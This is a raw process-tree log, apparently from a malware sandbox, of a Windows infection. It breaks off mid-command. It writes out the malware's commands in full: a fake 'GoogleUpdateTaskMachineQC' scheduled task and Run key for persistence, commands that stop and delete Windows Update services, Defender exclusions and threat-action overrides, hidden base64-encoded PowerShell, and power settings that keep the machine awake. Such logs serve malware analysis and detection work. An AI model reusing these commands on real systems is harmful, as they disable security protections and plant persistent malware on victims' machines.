- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2280
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3440
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1848
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3888
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3928
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4540
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:688
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2584
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3076
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2948
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:4044
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5084
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2792
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe pxpxvzslvmqtfph2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:392
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵PID:2016
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
PID:2772
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1696
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe jgqccdbbxrzbdlfm 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe7ZXiwOLhA74FQzXCOhDuCEgX6WVRJena9L8fAOb/OCpbdBtftU9QMBxG8aHan0UHttTlDXmg8zTJWEzz1jyzM08ycWZiYcc5uJhds9Rh8+fDvfznlHAMreIYNxYX5k9xJHAc4B0ozcm5wxfAVR1NkkPB2hskLA90oq6EEwunLM+cHugrCZPmAL+xjChc1L0WUYPKljZ7G2hVhhzqEtgfjve5jiLrrwjfPxGeeAf9vve0gqrSPFO0K58xxNJ8ClGMYA3jdfqtywTWLARpI3q8mmFmhW90pU5VNfoa01PrEPOLs5r8ABfO582XBZtlugNpAIuxABxOKWLf8XQtXZvoQ7dHNPMO3GgNUOP3U0XxrRiFOF/vB7jsNiVJkb1bI5v5nt59vi2Czwj87T9ujtAUxaRW+5V3BDnzrgkctEMZcXBV724S22jgwV6IzKvy6UKGJnVaM3eKyvceEhYeYhPyF7ZZaH7hc6eH/4/zT7gy/FOEOKoQlj9wOdYItup8djwg3zNzf9whNSzJ/f9PwHpnsQ==2⤵PID:1552
-
-
C:\Users\Admin\AppData\Local\Temp\16FC.exeC:\Users\Admin\AppData\Local\Temp\16FC.exe2⤵PID:4764
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
- Modifies firewall policy service
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:1908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 11244⤵
- Program crash
PID:1404
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4008
-
-
-
C:\Users\Admin\AppData\Local\Temp\2238.exeC:\Users\Admin\AppData\Local\Temp\2238.exe2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5112 -
C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe"C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe"3⤵PID:3828
-
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4344 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4836 -ip 48361⤵PID:4404
-
C:\Windows\SysWOW64\Ghxyq.exeC:\Windows\SysWOW64\Ghxyq.exe -auto1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\Ghxyq.exeC:\Windows\SysWOW64\Ghxyq.exe -acsi2⤵
- Executes dropped EXE
- Enumerates connected drives
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3888
-
-
C:\Windows\System32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
PID:408
-
C:\Windows\System32\sc.exesc stop bits1⤵
- Launches sc.exe
PID:1624
-
C:\Windows\System32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
PID:1832
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f1⤵PID:4196
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f1⤵PID:4436
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f1⤵PID:2100
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵PID:4440
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 01⤵PID:1076
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f1⤵PID:4828
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 01⤵PID:1928
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 01⤵PID:4060
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f1⤵PID:2428
-
C:\Windows\System32\sc.exesc stop dosvc1⤵
- Launches sc.exe
PID:5004
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc1⤵
- Launches sc.exe
PID:1916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3104 -ip 31041⤵PID:1784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4768 -ip 47681⤵PID:4732
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4148 -ip 41481⤵PID:4048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA1⤵PID:4260
-
C:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exeC:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exe1⤵PID:4652
-
C:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exeC:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵
- Suspicious use of SetThreadContext
PID:4848 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
PID:1284
-
-
-
-
C:\Users\Admin\AppData\Roaming\TypeId\Tags.exeC:\Users\Admin\AppData\Roaming\TypeId\Tags.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4736 -
C:\Users\Admin\AppData\Roaming\TypeId\Tags.exeC:\Users\Admin\AppData\Roaming\TypeId\Tags.exe2⤵
- Suspicious use of SetThreadContext
PID:5980 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe3⤵
- Suspicious use of SetThreadContext
PID:5896 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe4⤵PID:2944
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2776 -ip 27761⤵PID:5368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1908 -ip 19081⤵PID:5472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:5152
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4544 -ip 45441⤵PID:5136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3844 -ip 38441⤵PID:3964
-
C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\BbAXLjX.exeC:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\BbAXLjX.exe Ik /AZsite_idLOu 385118 /S1⤵
- Drops file in System32 directory
PID:2604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:5448
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6068
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5924
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:6100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:6004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:6020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5224
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t 